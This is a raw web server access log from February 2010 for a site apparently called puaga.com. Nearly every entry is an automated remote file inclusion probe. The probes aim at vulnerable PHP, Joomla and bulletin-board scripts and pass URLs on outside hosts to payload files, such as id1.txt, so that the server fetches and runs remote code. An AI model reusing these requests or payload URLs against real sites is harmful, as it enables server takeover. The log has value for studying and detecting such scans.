80.97.64.32 - - [19/Feb/2010:05:55:14 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:05:55:15 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:05:55:15 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:05:55:15 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:05:55:29 -0800] "GET /logs/access_100114.log%20%20//mwchat/libs/errors.php?error=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:05:55:29 -0800] "GET /logs//mwchat/libs/errors.php?error=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:05:55:29 -0800] "GET /mwchat/libs/errors.php?error=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:55:41 -0800] "GET /logs/access_100208.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:56:27 -0800] "GET /logs/access_100122.log//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:56:41 -0800] "GET /logs/access_100205.log//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:57:01 -0800] "GET /logs/access_100117.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:57:39 -0800] "GET /bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:57:39 -0800] "GET /logs/access_100128.log//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:57:39 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:57:55 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:57:55 -0800] "GET /bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:57:55 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [19/Feb/2010:05:57:55 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [19/Feb/2010:05:57:55 -0800] "GET /logs/access_100201.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [19/Feb/2010:05:57:55 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:58:21 -0800] "GET /logs/access_100122.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:58:42 -0800] "GET /logs/access_100211.log//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [19/Feb/2010:05:59:00 -0800] "GET /logs/access_100127.log///?board_skin_path=http://www.techedu.or.kr//bbs/data/board1/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [19/Feb/2010:05:59:01 -0800] "GET /logs///?board_skin_path=http://www.techedu.or.kr//bbs/data/board1/id2.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [19/Feb/2010:05:59:01 -0800] "GET //?board_skin_path=http://www.techedu.or.kr//bbs/data/board1/id2.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:05:59:16 -0800] "GET /errors.php?error=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:05:59:16 -0800] "GET /logs/errors.php?error=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.232.45.121 - - [19/Feb/2010:05:59:16 -0800] "GET /logs/access_100127.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:59:20 -0800] "GET /logs/access_100122.log//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:05:59:21 -0800] "GET /logs/access_100127.log/errors.php?error=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:05:59:27 -0800] "GET /logs/access_100129.log/errors.php?error=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:59:35 -0800] "GET /logs/access_100205.log//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:05:59:40 -0800] "GET /logs/access_100105.log//mwchat/libs/errors.php?error=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:59:53 -0800] "GET /bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:59:53 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:59:53 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:06:00:02 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:06:00:02 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:06:00:02 -0800] "GET /bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:00:30 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:00:30 -0800] "GET /logs/access_100125.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:00:30 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:06:00:34 -0800] "GET /logs/access_100114.log//mwchat/libs/errors.php?error=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:06:00:35 -0800] "GET /logs/access_100118.log//mwchat/libs/errors.php?error=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:00:37 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:00:37 -0800] "GET /logs/access_100125.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:00:37 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:00:38 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:00:38 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:00:39 -0800] "GET /logs/access_100125.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:00:39 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:00:39 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:00:39 -0800] "GET /logs/access_100125.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [19/Feb/2010:06:01:09 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [19/Feb/2010:06:01:10 -0800] "GET /ideal/forum/viewtopic.php?p=18425 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
69.64.70.246 - - [19/Feb/2010:06:01:22 -0800] "GET /logs/access_100125.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:01:22 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:01:22 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:06:01:33 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:06:01:33 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:06:01:33 -0800] "GET /logs/access_100201.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:01:35 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:01:35 -0800] "GET /logs/access_100125.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:01:35 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:01:38 -0800] "GET /logs/access_100114.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:06:01:43 -0800] "GET /logs/access_100115.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [19/Feb/2010:06:01:50 -0800] "GET /logs/access_100120.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wantedhack.altervista.org/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.186.58.214 - - [19/Feb/2010:06:01:50 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wantedhack.altervista.org/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.186.58.214 - - [19/Feb/2010:06:01:50 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wantedhack.altervista.org/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.186.58.214 - - [19/Feb/2010:06:01:56 -0800] "GET /logs/access_100118.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://wantedhack.altervista.org/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:01:57 -0800] "GET /logs/access_100114.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:02:11 -0800] "GET /logs/access_100201.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:06:02:15 -0800] "GET /logs/access_100205.log//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:06:02:16 -0800] "GET /logs/access_100122.log//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:02:29 -0800] "GET /logs/access_100201.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:03:56 -0800] "GET /logs/access_100201.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:04:04 -0800] "GET /logs/access_100201.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:04:04 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:04:04 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:04:07 -0800] "GET /logs/access_100114.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [19/Feb/2010:06:04:15 -0800] "GET /logs//mwchat/libs/errors.php?error=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [19/Feb/2010:06:04:15 -0800] "GET /mwchat/libs/errors.php?error=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [19/Feb/2010:06:04:16 -0800] "GET /logs/access_100114.log%20%20//mwchat/libs/errors.php?error=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:04:17 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:04:17 -0800] "GET /logs/access_100201.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:06:04:17 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:04:26 -0800] "GET /logs/access_100117.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [19/Feb/2010:06:04:29 -0800] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [19/Feb/2010:06:04:30 -0800] "GET /logs/access_100114.log%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [19/Feb/2010:06:04:30 -0800] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [19/Feb/2010:06:04:39 -0800] "GET /logs/access_100118.log%20%20//mwchat/libs/errors.php?error=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:06:04:52 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:06:04:52 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:06:04:52 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:06:04:52 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:06:04:52 -0800] "GET /logs/access_100114.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:06:04:53 -0800] "GET /logs/access_100114.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [19/Feb/2010:06:05:33 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:06:05:35 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:06:05:35 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:06:05:35 -0800] "GET /logs/access_100115.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:06:05:45 -0800] "GET /logs/access_100115.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:06:05:45 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:06:05:45 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:06:06:04 -0800] "GET /logs/access_100119.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [19/Feb/2010:06:06:05 -0800] "GET /logs/access_100202.log%20%20//bbs///////write_update?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:06:06:13 -0800] "GET /logs/access_100119.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:06:43 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:06:44 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:06:50 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.138.217 - - [19/Feb/2010:06:06:54 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.138.217 - - [19/Feb/2010:06:06:54 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.138.217 - - [19/Feb/2010:06:06:54 -0800] "GET /logs/access_100119.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.138.217 - - [19/Feb/2010:06:07:12 -0800] "GET /logs/access_100126.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
